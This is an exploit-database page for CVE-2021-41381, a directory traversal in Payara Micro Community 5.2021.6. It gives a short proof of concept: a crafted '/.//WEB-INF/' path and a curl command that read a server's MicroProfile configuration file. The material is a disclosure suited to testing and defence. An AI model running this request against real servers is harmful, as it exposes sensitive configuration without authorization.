Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Payara Micro Community 5.2021.6 - Directory Traversal Vulnerability

πŸ—“οΈΒ 04 Oct 2021Β 00:00:00Reported byΒ Yasser KhanTypeΒ 
zdt
Β zdtπŸ”—Β 0day.todayπŸ‘Β 172Β Views

Payara Micro Community 5.2021.6 Directory Traversal Vulnerability Exposes Sensitive Configuration Dat

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Payara Platform Path Traversal Vulnerability
16 Nov 202200:00
–zdt
ATTACKERKB		CVE-2021-41381
23 Sep 202115:15
–attackerkb
Circl		CVE-2021-41381
23 Sep 202118:29
–circl
CNNVD		Payara Micro Community θ·―εΎ„ιεŽ†ζΌζ΄ž
23 Sep 202100:00
–cnnvd
CVE		CVE-2021-41381
23 Sep 202100:00
–cve
Cvelist		CVE-2021-41381
23 Sep 202100:00
–cvelist
Exploit DB		Payara Micro Community 5.2021.6 - Directory Traversal
4 Oct 202100:00
–exploitdb
Nuclei		Payara Micro Community 5.2021.6 Directory Traversal
28 Jun 202615:08
–nuclei
NVD		CVE-2021-41381
23 Sep 202115:15
–nvd
OpenVAS		'/.//WEB-INF/' Information Disclosure Vulnerability (HTTP)
6 Oct 202100:00
–openvas
Rows per page
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381

https://nvd.nist.gov/vuln/detail/CVE-2021-41381

Proof of Concept:

Step1: Open the browser check the version of the payara software

Step2: Add this Path at end of the URL
/.//WEB-INF/classes/META-INF/microprofile-config.properties

Step3: Check the response with match containing
"payara.security.openid.default.providerURI="

"payara.security.openid.sessionScopedConfiguration=true"

Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.

Step5: Alternatively we can use CURL by using this command:

Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties

Reference:

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
https://nvd.nist.gov/vuln/detail/CVE-2021-41381

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Oct 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 24.3
CVSS 3.17.5
EPSS0.52926
payara microcommunity editiondirectory traversalvulnerabilitysensitive data
172